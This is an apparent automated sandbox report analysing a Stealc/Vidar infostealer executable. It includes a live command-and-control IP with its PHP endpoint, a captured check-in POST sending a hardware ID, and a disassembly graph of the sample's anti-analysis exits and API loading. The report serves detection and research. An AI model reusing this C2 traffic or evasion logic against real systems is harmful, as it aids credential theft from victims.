                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.948594014604717
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'854'976 bytes
                        MD5:e12ed88e4c214b23dfbd11ea91d2ece8
                        SHA1:2a76376af58e1a12f2947de272a3e6ebb8174fe4
                        SHA256:6ab0865ecbaf0e450e68a7d866f036113b50ae6edff09b1f0e41c2514cf72233
                        SHA512:6d6f7213a6eaf5b5545be1d99606827c00613cef505188b46fb4e9f4149ccc047d8d2b620dd88aa33f6dd1d67aed3095eb64f853a068271d1418743f2156e1a7
                        SSDEEP:49152:nQKmJu3h2Uwgz+LAPgzIL3rHGloGeNW5Y6:nQPuqi0A+U4oGeca6
                        TLSH:14853320FD21E526E68443B8ED97744DA7FC61B70B9A0467C3447EDC0CF7A62C4B52AA
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xaa1000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F8FB9448EFAh
                        cvttps2pi mm3, qword ptr [eax+eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007F8FB944AEF5h
                        add byte ptr [edi], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [edi], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 0Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x22800719b4054e1a4cbbbcd6f2e7b8dcfb19aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x25e0000x2a30000x20001ba1c6675249cd7fa22fddeb93e55aaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        qydepkqh0x5010000x19f0000x19ec003cea630ade093ec1dcb6b94fc491dcc3False0.9947846029234478data7.953404552841359IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        zugntyrx0x6a00000x10000x400ea4d659eaa07642a8556f77a98af9517False0.771484375data6.0857355844108305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6a10000x30000x22003b78123bab2747ef64ba82b0c61a98faFalse0.05744485294117647DOS executable (COM)0.7575471514298449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-14T11:03:08.697679+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649711185.215.113.3780TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 14, 2024 11:03:07.582108021 CEST4971180192.168.2.6185.215.113.37
                        Oct 14, 2024 11:03:07.587286949 CEST8049711185.215.113.37192.168.2.6
                        Oct 14, 2024 11:03:07.587364912 CEST4971180192.168.2.6185.215.113.37
                        Oct 14, 2024 11:03:07.588052988 CEST4971180192.168.2.6185.215.113.37
                        Oct 14, 2024 11:03:07.592927933 CEST8049711185.215.113.37192.168.2.6
                        Oct 14, 2024 11:03:08.314240932 CEST8049711185.215.113.37192.168.2.6
                        Oct 14, 2024 11:03:08.317508936 CEST4971180192.168.2.6185.215.113.37
                        Oct 14, 2024 11:03:08.464716911 CEST4971180192.168.2.6185.215.113.37
                        Oct 14, 2024 11:03:08.469602108 CEST8049711185.215.113.37192.168.2.6
                        Oct 14, 2024 11:03:08.697602987 CEST8049711185.215.113.37192.168.2.6
                        Oct 14, 2024 11:03:08.697679043 CEST4971180192.168.2.6185.215.113.37
                        Oct 14, 2024 11:03:12.796339989 CEST4971180192.168.2.6185.215.113.37

                        HTTP Request Dependency Graph

                        • 185.215.113.37

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.649711185.215.113.37806444C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Oct 14, 2024 11:03:07.588052988 CEST89OUTGET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 14, 2024 11:03:08.314240932 CEST203INHTTP/1.1 200 OK
                        Date: Mon, 14 Oct 2024 09:03:08 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 14, 2024 11:03:08.464716911 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 42 38 34 38 42 41 31 38 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a
                        Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"F0B848BA18AD2322695909------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"doma------ECGIIIDAKJDHJKFHIEBF--
                        Oct 14, 2024 11:03:08.697602987 CEST210INHTTP/1.1 200 OK
                        Date: Mon, 14 Oct 2024 09:03:08 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:05:03:02
                        Start date:14/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x540000
                        File size:1'854'976 bytes
                        MD5 hash:E12ED88E4C214B23DFBD11EA91D2ECE8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:8.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:9.7%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
                          execution_graph 13501 5569f0 13546 542260 13501->13546 13525 556a64 13526 55a9b0 4 API calls 13525->13526 13527 556a6b 13526->13527 13528 55a9b0 4 API calls 13527->13528 13529 556a72 13528->13529 13530 55a9b0 4 API calls 13529->13530 13531 556a79 13530->13531 13532 55a9b0 4 API calls 13531->13532 13533 556a80 13532->13533 13698 55a8a0 13533->13698 13535 556b0c 13702 556920 GetSystemTime 13535->13702 13536 556a89 13536->13535 13538 556ac2 OpenEventA 13536->13538 13540 556af5 CloseHandle Sleep 13538->13540 13541 556ad9 13538->13541 13543 556b0a 13540->13543 13545 556ae1 CreateEventA 13541->13545 13543->13536 13545->13535 13899 5445c0 13546->13899 13548 542274 13549 5445c0 2 API calls 13548->13549 13550 54228d 13549->13550 13551 5445c0 2 API calls 13550->13551 13552 5422a6 13551->13552 13553 5445c0 2 API calls 13552->13553 13554 5422bf 13553->13554 13555 5445c0 2 API calls 13554->13555 13556 5422d8 13555->13556 13557 5445c0 2 API calls 13556->13557 13558 5422f1 13557->13558 13559 5445c0 2 API calls 13558->13559 13560 54230a 13559->13560 13561 5445c0 2 API calls 13560->13561 13562 542323 13561->13562 13563 5445c0 2 API calls 13562->13563 13564 54233c 13563->13564 13565 5445c0 2 API calls 13564->13565 13566 542355 13565->13566 13567 5445c0 2 API calls 13566->13567 13568 54236e 13567->13568 13569 5445c0 2 API calls 13568->13569 13570 542387 13569->13570 13571 5445c0 2 API calls 13570->13571 13572 5423a0 13571->13572 13573 5445c0 2 API calls 13572->13573 13574 5423b9 13573->13574 13575 5445c0 2 API calls 13574->13575 13576 5423d2 13575->13576 13577 5445c0 2 API calls 13576->13577 13578 5423eb 13577->13578 13579 5445c0 2 API calls 13578->13579 13580 542404 13579->13580 13581 5445c0 2 API calls 13580->13581 13582 54241d 13581->13582 13583 5445c0 2 API calls 13582->13583 13584 542436 13583->13584 13585 5445c0 2 API calls 13584->13585 13586 54244f 13585->13586 13587 5445c0 2 API calls 13586->13587 13588 542468 13587->13588 13589 5445c0 2 API calls 13588->13589 13590 542481 13589->13590 13591 5445c0 2 API calls 13590->13591 13592 54249a 13591->13592 13593 5445c0 2 API calls 13592->13593 13594 5424b3 13593->13594 13595 5445c0 2 API calls 13594->13595 13596 5424cc 13595->13596 13597 5445c0 2 API calls 13596->13597 13598 5424e5 13597->13598 13599 5445c0 2 API calls 13598->13599 13600 5424fe 13599->13600 13601 5445c0 2 API calls 13600->13601 13602 542517 13601->13602 13603 5445c0 2 API calls 13602->13603 13604 542530 13603->13604 13605 5445c0 2 API calls 13604->13605 13606 542549 13605->13606 13607 5445c0 2 API calls 13606->13607 13608 542562 13607->13608 13609 5445c0 2 API calls 13608->13609 13610 54257b 13609->13610 13611 5445c0 2 API calls 13610->13611 13612 542594 13611->13612 13613 5445c0 2 API calls 13612->13613 13614 5425ad 13613->13614 13615 5445c0 2 API calls 13614->13615 13616 5425c6 13615->13616 13617 5445c0 2 API calls 13616->13617 13618 5425df 13617->13618 13619 5445c0 2 API calls 13618->13619 13620 5425f8 13619->13620 13621 5445c0 2 API calls 13620->13621 13622 542611 13621->13622 13623 5445c0 2 API calls 13622->13623 13624 54262a 13623->13624 13625 5445c0 2 API calls 13624->13625 13626 542643 13625->13626 13627 5445c0 2 API calls 13626->13627 13628 54265c 13627->13628 13629 5445c0 2 API calls 13628->13629 13630 542675 13629->13630 13631 5445c0 2 API calls 13630->13631 13632 54268e 13631->13632 13633 559860 13632->13633 13904 559750 GetPEB 13633->13904 13635 559868 13636 559a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13635->13636 13637 55987a 13635->13637 13638 559af4 GetProcAddress 13636->13638 13639 559b0d 13636->13639 13640 55988c 21 API calls 13637->13640 13638->13639 13641 559b46 13639->13641 13642 559b16 GetProcAddress GetProcAddress 13639->13642 13640->13636 13643 559b4f GetProcAddress 13641->13643 13644 559b68 13641->13644 13642->13641 13643->13644 13645 559b71 GetProcAddress 13644->13645 13646 559b89 13644->13646 13645->13646 13647 556a00 13646->13647 13648 559b92 GetProcAddress GetProcAddress 13646->13648 13649 55a740 13647->13649 13648->13647 13650 55a750 13649->13650 13651 556a0d 13650->13651 13652 55a77e lstrcpy 13650->13652 13653 5411d0 13651->13653 13652->13651 13654 5411e8 13653->13654 13655 541217 13654->13655 13656 54120f ExitProcess 13654->13656 13657 541160 GetSystemInfo 13655->13657 13658 541184 13657->13658 13659 54117c ExitProcess 13657->13659 13660 541110 GetCurrentProcess VirtualAllocExNuma 13658->13660 13661 541141 ExitProcess 13660->13661 13662 541149 13660->13662 13905 5410a0 VirtualAlloc 13662->13905 13665 541220 13909 5589b0 13665->13909 13668 541249 __aulldiv 13669 54129a 13668->13669 13670 541292 ExitProcess 13668->13670 13671 556770 GetUserDefaultLangID 13669->13671 13672 5567d3 13671->13672 13673 556792 13671->13673 13679 541190 13672->13679 13673->13672 13674 5567b7 ExitProcess 13673->13674 13675 5567c1 ExitProcess 13673->13675 13676 5567a3 ExitProcess 13673->13676 13677 5567ad ExitProcess 13673->13677 13678 5567cb ExitProcess 13673->13678 13680 5578e0 3 API calls 13679->13680 13682 54119e 13680->13682 13681 5411cc 13686 557850 GetProcessHeap RtlAllocateHeap GetUserNameA 13681->13686 13682->13681 13683 557850 3 API calls 13682->13683 13684 5411b7 13683->13684 13684->13681 13685 5411c4 ExitProcess 13684->13685 13687 556a30 13686->13687 13688 5578e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13687->13688 13689 556a43 13688->13689 13690 55a9b0 13689->13690 13911 55a710 13690->13911 13692 55a9c1 lstrlen 13694 55a9e0 13692->13694 13693 55aa18 13912 55a7a0 13693->13912 13694->13693 13697 55a9fa lstrcpy lstrcat 13694->13697 13696 55aa24 13696->13525 13697->13693 13699 55a8bb 13698->13699 13700 55a90b 13699->13700 13701 55a8f9 lstrcpy 13699->13701 13700->13536 13701->13700 13916 556820 13702->13916 13704 55698e 13705 556998 sscanf 13704->13705 13945 55a800 13705->13945 13707 5569aa SystemTimeToFileTime SystemTimeToFileTime 13708 5569e0 13707->13708 13709 5569ce 13707->13709 13711 555b10 13708->13711 13709->13708 13710 5569d8 ExitProcess 13709->13710 13712 555b1d 13711->13712 13713 55a740 lstrcpy 13712->13713 13714 555b2e 13713->13714 13947 55a820 lstrlen 13714->13947 13717 55a820 2 API calls 13718 555b64 13717->13718 13719 55a820 2 API calls 13718->13719 13720 555b74 13719->13720 13951 556430 13720->13951 13723 55a820 2 API calls 13724 555b93 13723->13724 13725 55a820 2 API calls 13724->13725 13726 555ba0 13725->13726 13727 55a820 2 API calls 13726->13727 13728 555bad 13727->13728 13729 55a820 2 API calls 13728->13729 13730 555bf9 13729->13730 13960 5426a0 13730->13960 13738 555cc3 13739 556430 lstrcpy 13738->13739 13740 555cd5 13739->13740 13741 55a7a0 lstrcpy 13740->13741 13742 555cf2 13741->13742 13743 55a9b0 4 API calls 13742->13743 13744 555d0a 13743->13744 13745 55a8a0 lstrcpy 13744->13745 13746 555d16 13745->13746 13747 55a9b0 4 API calls 13746->13747 13748 555d3a 13747->13748 13749 55a8a0 lstrcpy 13748->13749 13750 555d46 13749->13750 13751 55a9b0 4 API calls 13750->13751 13752 555d6a 13751->13752 13753 55a8a0 lstrcpy 13752->13753 13754 555d76 13753->13754 13755 55a740 lstrcpy 13754->13755 13756 555d9e 13755->13756 14686 557500 GetWindowsDirectoryA 13756->14686 13759 55a7a0 lstrcpy 13760 555db8 13759->13760 14696 544880 13760->14696 13762 555dbe 14841 5517a0 13762->14841 13764 555dc6 13765 55a740 lstrcpy 13764->13765 13766 555de9 13765->13766 13767 541590 lstrcpy 13766->13767 13768 555dfd 13767->13768 14857 545960 13768->14857 13770 555e03 15001 551050 13770->15001 13772 555e0e 13773 55a740 lstrcpy 13772->13773 13774 555e32 13773->13774 13775 541590 lstrcpy 13774->13775 13776 555e46 13775->13776 13777 545960 34 API calls 13776->13777 13778 555e4c 13777->13778 15005 550d90 13778->15005 13780 555e57 13781 55a740 lstrcpy 13780->13781 13782 555e79 13781->13782 13783 541590 lstrcpy 13782->13783 13784 555e8d 13783->13784 13785 545960 34 API calls 13784->13785 13786 555e93 13785->13786 15012 550f40 13786->15012 13788 555e9e 13789 541590 lstrcpy 13788->13789 13790 555eb5 13789->13790 15017 551a10 13790->15017 13792 555eba 13793 55a740 lstrcpy 13792->13793 13794 555ed6 13793->13794 15361 544fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13794->15361 13796 555edb 13797 541590 lstrcpy 13796->13797 13798 555f5b 13797->13798 15368 550740 13798->15368 13800 555f60 13801 55a740 lstrcpy 13800->13801 13802 555f86 13801->13802 13803 541590 lstrcpy 13802->13803 13804 555f9a 13803->13804 13805 545960 34 API calls 13804->13805 13900 5445d1 RtlAllocateHeap 13899->13900 13903 544621 VirtualProtect 13900->13903 13903->13548 13904->13635 13906 5410c2 codecvt 13905->13906 13907 5410fd 13906->13907 13908 5410e2 VirtualFree 13906->13908 13907->13665 13908->13907 13910 541233 GlobalMemoryStatusEx 13909->13910 13910->13668 13911->13692 13913 55a7c2 13912->13913 13914 55a7ec 13913->13914 13915 55a7da lstrcpy 13913->13915 13914->13696 13915->13914 13917 55a740 lstrcpy 13916->13917 13918 556833 13917->13918 13919 55a9b0 4 API calls 13918->13919 13920 556845 13919->13920 13921 55a8a0 lstrcpy 13920->13921 13922 55684e 13921->13922 13923 55a9b0 4 API calls 13922->13923 13924 556867 13923->13924 13925 55a8a0 lstrcpy 13924->13925 13926 556870 13925->13926 13927 55a9b0 4 API calls 13926->13927 13928 55688a 13927->13928 13929 55a8a0 lstrcpy 13928->13929 13930 556893 13929->13930 13931 55a9b0 4 API calls 13930->13931 13932 5568ac 13931->13932 13933 55a8a0 lstrcpy 13932->13933 13934 5568b5 13933->13934 13935 55a9b0 4 API calls 13934->13935 13936 5568cf 13935->13936 13937 55a8a0 lstrcpy 13936->13937 13938 5568d8 13937->13938 13939 55a9b0 4 API calls 13938->13939 13940 5568f3 13939->13940 13941 55a8a0 lstrcpy 13940->13941 13942 5568fc 13941->13942 13943 55a7a0 lstrcpy 13942->13943 13944 556910 13943->13944 13944->13704 13946 55a812 13945->13946 13946->13707 13948 55a83f 13947->13948 13949 555b54 13948->13949 13950 55a87b lstrcpy 13948->13950 13949->13717 13950->13949 13952 55a8a0 lstrcpy 13951->13952 13953 556443 13952->13953 13954 55a8a0 lstrcpy 13953->13954 13955 556455 13954->13955 13956 55a8a0 lstrcpy 13955->13956 13957 556467 13956->13957 13958 55a8a0 lstrcpy 13957->13958 13959 555b86 13958->13959 13959->13723 13961 5445c0 2 API calls 13960->13961 13962 5426b4 13961->13962 13963 5445c0 2 API calls 13962->13963 13964 5426d7 13963->13964 13965 5445c0 2 API calls 13964->13965 13966 5426f0 13965->13966 13967 5445c0 2 API calls 13966->13967 13968 542709 13967->13968 13969 5445c0 2 API calls 13968->13969 13970 542736 13969->13970 13971 5445c0 2 API calls 13970->13971 13972 54274f 13971->13972 13973 5445c0 2 API calls 13972->13973 13974 542768 13973->13974 13975 5445c0 2 API calls 13974->13975 13976 542795 13975->13976 13977 5445c0 2 API calls 13976->13977 13978 5427ae 13977->13978 13979 5445c0 2 API calls 13978->13979 13980 5427c7 13979->13980 13981 5445c0 2 API calls 13980->13981 13982 5427e0 13981->13982 13983 5445c0 2 API calls 13982->13983 13984 5427f9 13983->13984 13985 5445c0 2 API calls 13984->13985 13986 542812 13985->13986 13987 5445c0 2 API calls 13986->13987 13988 54282b 13987->13988 13989 5445c0 2 API calls 13988->13989 13990 542844 13989->13990 13991 5445c0 2 API calls 13990->13991 13992 54285d 13991->13992 13993 5445c0 2 API calls 13992->13993 13994 542876 13993->13994 13995 5445c0 2 API calls 13994->13995 13996 54288f 13995->13996 13997 5445c0 2 API calls 13996->13997 13998 5428a8 13997->13998 13999 5445c0 2 API calls 13998->13999 14000 5428c1 13999->14000 14001 5445c0 2 API calls 14000->14001 14002 5428da 14001->14002 14003 5445c0 2 API calls 14002->14003 14004 5428f3 14003->14004 14005 5445c0 2 API calls 14004->14005 14006 54290c 14005->14006 14007 5445c0 2 API calls 14006->14007 14008 542925 14007->14008 14009 5445c0 2 API calls 14008->14009 14010 54293e 14009->14010 14011 5445c0 2 API calls 14010->14011 14012 542957 14011->14012 14013 5445c0 2 API calls 14012->14013 14014 542970 14013->14014 14015 5445c0 2 API calls 14014->14015 14016 542989 14015->14016 14017 5445c0 2 API calls 14016->14017 14018 5429a2 14017->14018 14019 5445c0 2 API calls 14018->14019 14020 5429bb 14019->14020 14021 5445c0 2 API calls 14020->14021 14022 5429d4 14021->14022 14023 5445c0 2 API calls 14022->14023 14024 5429ed 14023->14024 14025 5445c0 2 API calls 14024->14025 14026 542a06 14025->14026 14027 5445c0 2 API calls 14026->14027 14028 542a1f 14027->14028 14029 5445c0 2 API calls 14028->14029 14030 542a38 14029->14030 14031 5445c0 2 API calls 14030->14031 14032 542a51 14031->14032 14033 5445c0 2 API calls 14032->14033 14034 542a6a 14033->14034 14035 5445c0 2 API calls 14034->14035 14036 542a83 14035->14036 14037 5445c0 2 API calls 14036->14037 14038 542a9c 14037->14038 14039 5445c0 2 API calls 14038->14039 14040 542ab5 14039->14040 14041 5445c0 2 API calls 14040->14041 14042 542ace 14041->14042 14043 5445c0 2 API calls 14042->14043 14044 542ae7 14043->14044 14045 5445c0 2 API calls 14044->14045 14046 542b00 14045->14046 14047 5445c0 2 API calls 14046->14047 14048 542b19 14047->14048 14049 5445c0 2 API calls 14048->14049 14050 542b32 14049->14050 14051 5445c0 2 API calls 14050->14051 14052 542b4b 